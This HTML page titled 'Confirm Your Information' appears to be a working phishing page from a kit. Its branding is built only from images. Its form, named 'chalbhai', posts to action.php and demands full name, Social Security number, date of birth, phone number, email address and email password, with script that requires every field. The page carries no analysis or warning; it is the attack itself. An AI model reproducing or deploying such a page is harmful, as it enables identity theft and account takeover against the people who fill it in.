<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<style> 
 
 .inputs {
    padding: 8px;
    border-radius: 3px;
    border: 1px solid #CCC;
    background-image: none;
    width: 270px;
	height: 27px;
	font-size: 12px;
}

.inputs:focus {
    outline-color: #54B4AD;
}
</style> 




<head>
<title>Confirm Your Information</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">


<link rel="shortcut icon"
              href="images/favicon.ico"/>
<style type="text/css">
/*----------Text Styles----------*/
.ws6 {font-size: 8px;}
.ws7 {font-size: 9.3px;}
.ws8 {font-size: 11px;}
.ws9 {font-size: 12px;}
.ws10 {font-size: 13px;}
.ws11 {font-size: 15px;}
.ws12 {font-size: 16px;}
.ws14 {font-size: 19px;}
.ws16 {font-size: 21px;}
.ws18 {font-size: 24px;}
.ws20 {font-size: 27px;}
.ws22 {font-size: 29px;}
.ws24 {font-size: 32px;}
.ws26 {font-size: 35px;}
.ws28 {font-size: 37px;}
.ws36 {font-size: 48px;}
.ws48 {font-size: 64px;}
.ws72 {font-size: 96px;}
.wpmd {font-size: 13px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal;}
/*----------Para Styles----------*/
DIV,UL,OL /* Left */
{
 margin-top: 0px;
 margin-bottom: 0px;
}
</style>



<script LANGUAGE="JavaScript">
<!--

var b = 0 ;
var i = 0 ;
var errmsg = "" ;
var punct = "" ;
var min = 0 ;
var max = 0 ;

function formbreeze_email(field) {

	if (b && (field.value.length == 0)) return true ;


	if (! emailCheck(field.value))
	  {
		  field.focus();
		  if (field.type == "text") field.select();
		  return false ;
	  }

   return true ;
}

function formbreeze_filledin(field) {

if (b && (field.value.length == 0)) return true;

if (field.value.length < min) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false ;
   }

if ((max > 0) && (field.value.length > max)) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false ;
   }

return true ;
}

function formbreeze_number(field) {

if (b && (field.value.length == 0)) return true ; ;

if (i)
 var valid = "0123456789"
else
 var valid = ".,0123456789"

var pass = 1;
var temp;
for (var i=0; i<field.value.length; i++) {
temp = "" + field.value.substring(i, i+1);
if (valid.indexOf(temp) == "-1") pass = 0;

}

if (!pass) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false;
 }

if (field.value < min) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false;
   }


if ((max > 0) && (field.value > max)) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false;
   }

return true ;
}


function formbreeze_numseq(field) {


if (b && (field.value.length == 0)) return true ;

var valid = punct + "0123456789"

var pass = 1;
var digits = 0
var temp;
for (var i=0; i<field.value.length; i++) {
temp = "" + field.value.substring(i, i+1);
if (valid.indexOf(temp) == "-1") pass = 0;
if (valid.indexOf(temp) > (punct.length-1) ) digits++ ;

}

if (!pass) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false ; ;
   }

if (digits < min) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false;
   }

if ((max > 0) && (digits > max)) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false;
   }

return true ;
}

function emailCheck (emailStr) {

var checkTLD=1;
var knownDomsPat=/^(com|net|org|edu|int|mil|gov|arpa|biz|aero|name|coop|info|pro|museum|ws)$/;
var emailPat=/^(.+)@(.+)$/;
var specialChars="\\(\\)><@,;:\\\\\\\"\\.\\[\\]";
var validChars="\[^\\s" + specialChars + "\]";
var quotedUser="(\"[^\"]*\")";
var atom=validChars + '+';
var word="(" + atom + "|" + quotedUser + ")";
var userPat=new RegExp("^" + word + "(\\." + word + ")*$");
var domainPat=new RegExp("^" + atom + "(\\." + atom +")*$");
var matchArray=emailStr.match(emailPat);

if (matchArray==null) {
alert(errmsg);
return false;
}
var user=matchArray[1];
var domain=matchArray[2];

for (i=0; i<user.length; i++) {
if (user.charCodeAt(i)>127) {
alert(errmsg);
return false;
   }
}
for (i=0; i<domain.length; i++) {
if (domain.charCodeAt(i)>127) {
alert(errmsg);
return false;
   }
}

if (user.match(userPat)==null) {
alert(errmsg);
return false;
}

var atomPat=new RegExp("^" + atom + "$");
var domArr=domain.split(".");
var len=domArr.length;
for (i=0;i<len;i++) {
if (domArr[i].search(atomPat)==-1) {
alert(errmsg);
return false;
   }
}

if (checkTLD && domArr[domArr.length-1].length!=2 &&
domArr[domArr.length-1].search(knownDomsPat)==-1) {
alert(errmsg);
return false;
}

if (len<2) {
alert(errmsg);
return false;
}

return true;
}

function formbreeze_sub()
{
/*
//FBDATA:formtext1^0^1^0^0^Please Fill in All Of the  Fields:;formtext2^0^1^0^0^Please Fill in All Of the  Fields:;formtext3^0^1^0^0^Please Fill in All Of the  Fields:;formtext4^0^1^0^0^Please Fill in All Of the  Fields:;formtext5^0^1^0^0^Please Fill in All Of the  Fields:;formtext6^0^1^0^0^Please Fill in All Of the  Fields:;formtext7^0^1^0^0^Please Fill in All Of the  Fields:;formtext8^0^1^0^0^Please Fill in All Of the  Fields:;
*/
b=0;
errmsg="Please Fill in All Of the  Fields";
min=1;
max=0;
if (! formbreeze_filledin(document.chalbhai.formtext1) ) return false ;
b=0;
errmsg="Please Fill in All Of the  Fields";
min=1;
max=0;
if (! formbreeze_filledin(document.chalbhai.formtext2) ) return false ;
b=0;
errmsg="Please Fill in All Of the  Fields";
min=1;
max=0;
if (! formbreeze_filledin(document.chalbhai.formtext3) ) return false ;
b=0;
errmsg="Please Fill in All Of the  Fields";
min=1;
max=0;
if (! formbreeze_filledin(document.chalbhai.formtext4) ) return false ;
b=0;
errmsg="Please Fill in All Of the  Fields";
min=1;
max=0;
if (! formbreeze_filledin(document.chalbhai.formtext5) ) return false ;
b=0;
errmsg="Please Fill in All Of the  Fields";
min=1;
max=0;
if (! formbreeze_filledin(document.chalbhai.formtext6) ) return false ;
b=0;
errmsg="Please Fill in All Of the  Fields";
min=1;
max=0;
if (! formbreeze_filledin(document.chalbhai.formtext7) ) return false ;
b=0;
errmsg="Please Fill in All Of the  Fields";
min=1;
max=0;
if (! formbreeze_filledin(document.chalbhai.formtext8) ) return false ;

}
-->
</script>

</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:1px; width:1350px; height:496px; z-index:0"><img src="images/back.png" alt="" title="" border=0 width=1350 height=496></div>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:769px; width:1352px; height:395px; z-index:1"><img src="images/backfooter.png" alt="" title="" border=0 width=1352 height=395></div>

<div id="image3" style="position:absolute; overflow:hidden; left:207px; top:668px; width:974px; height:80px; z-index:2"><a href="#"><img src="images/morerates.png" alt="" title="" border=0 width=974 height=80></a></div>

<div id="image7" style="position:absolute; overflow:hidden; left:988px; top:1px; width:171px; height:32px; z-index:3"><a href="#"><img src="images/join.png" alt="" title="" border=0 width=171 height=32></a></div>

<div id="image8" style="position:absolute; overflow:hidden; left:192px; top:102px; width:970px; height:49px; z-index:4"><a href="#"><img src="images/ttt.png" alt="" title="" border=0 width=970 height=49></a></div>

<div id="image9" style="position:absolute; overflow:hidden; left:191px; top:9px; width:264px; height:84px; z-index:5"><a href="#"><img src="images/logo.png" alt="" title="" border=0 width=264 height=84></a></div>

<div id="image10" style="position:absolute; overflow:hidden; left:517px; top:70px; width:644px; height:25px; z-index:6"><a href="#"><img src="images/wooo.png" alt="" title="" border=0 width=644 height=25></a></div>

<div id="image11" style="position:absolute; overflow:hidden; left:187px; top:787px; width:1009px; height:378px; z-index:7"><a href="#"><img src="images/footer.png" alt="" title="" border=0 width=1009 height=378></a></div>

<div id="image4" style="position:absolute; overflow:hidden; left:206px; top:176px; width:515px; height:314px; z-index:8"><img src="images/2nd.png" alt="" title="" border=0 width=515 height=314></div>

<div id="image5" style="position:absolute; overflow:hidden; left:206px; top:480px; width:515px; height:116px; z-index:9"><img src="images/2nnd.png" alt="" title="" border=0 width=515 height=116></div>

<div id="text1" style="position:absolute; overflow:hidden; left:226px; top:290px; width:73px; height:26px; z-index:10">
<div class="wpmd">
<div><B>Full Name:</B></div>
</div></div>
<form action=action.php name=chalbhai id=chalbhai method=post  onsubmit=" return formbreeze_sub()" >
<input name="formtext1"  class="inputs" type="text" style="position:absolute;width:292px;left:386px;top:282px;z-index:11">
<div id="text2" style="position:absolute; overflow:hidden; left:222px; top:331px; width:159px; height:26px; z-index:12">
<div class="wpmd">
<div><B>Social Security Number</B></div>
</div></div>

<input name="formtext2"  class="inputs" type="password" maxlength=9 style="position:absolute;width:103px;left:388px;top:324px;z-index:13">
<div id="text3" style="position:absolute; overflow:hidden; left:223px; top:373px; width:158px; height:26px; z-index:14">
<div class="wpmd">
<div><B>Date of Birth</B></div>
</div></div>

<input name="formtext3"  class="inputs" type="text" maxlength=2 style="position:absolute;width:45px;left:388px;top:367px;z-index:15">
<div id="text4" style="position:absolute; overflow:hidden; left:438px; top:367px; width:13px; height:26px; z-index:16">
<div class="wpmd">
<div><font color="#808080" class="ws14"><B>/</B></font></div>
</div></div>

<input name="formtext4"  class="inputs" type="text" maxlength=2 style="position:absolute;width:45px;left:450px;top:366px;z-index:17">
<div id="text5" style="position:absolute; overflow:hidden; left:500px; top:365px; width:13px; height:26px; z-index:18">
<div class="wpmd">
<div><font color="#808080" class="ws14"><B>/</B></font></div>
</div></div>

<input name="formtext5"  class="inputs" type="text" maxlength=4 style="position:absolute;width:50px;left:509px;top:365px;z-index:19">
<div id="text6" style="position:absolute; overflow:hidden; left:564px; top:366px; width:109px; height:24px; z-index:20">
<div class="wpmd">
<div><font class="ws11"> (mm/dd/yyyy)</font></div>
</div></div>

<div id="text7" style="position:absolute; overflow:hidden; left:223px; top:410px; width:412px; height:27px; z-index:21">
<div class="wpmd">
<div><B>Phone Number</B></div>
</div></div>

<input name="formtext6"  class="inputs" type="text" style="position:absolute;width:292px;left:386px;top:409px;z-index:22">
<div id="text8" style="position:absolute; overflow:hidden; left:225px; top:453px; width:412px; height:27px; z-index:23">
<div class="wpmd">
<div><B>E-Mail Address</B></div>
</div></div>

<input name="formtext7"  class="inputs" type="text" style="position:absolute;width:292px;left:386px;top:451px;z-index:24">
<div id="text9" style="position:absolute; overflow:hidden; left:225px; top:492px; width:412px; height:27px; z-index:25">
<div class="wpmd">
<div><B>E-Mail Password</B></div>
</div></div>

<input name="formtext8"  class="inputs" type="password" style="position:absolute;width:292px;left:386px;top:490px;z-index:26">
<div id="formimage1" style="position:absolute; left:604px; top:538px; z-index:27"><input type="image" name="formimage1" width="74" height="32" src="images/next.png"></div>
</form>
</body>
</html>
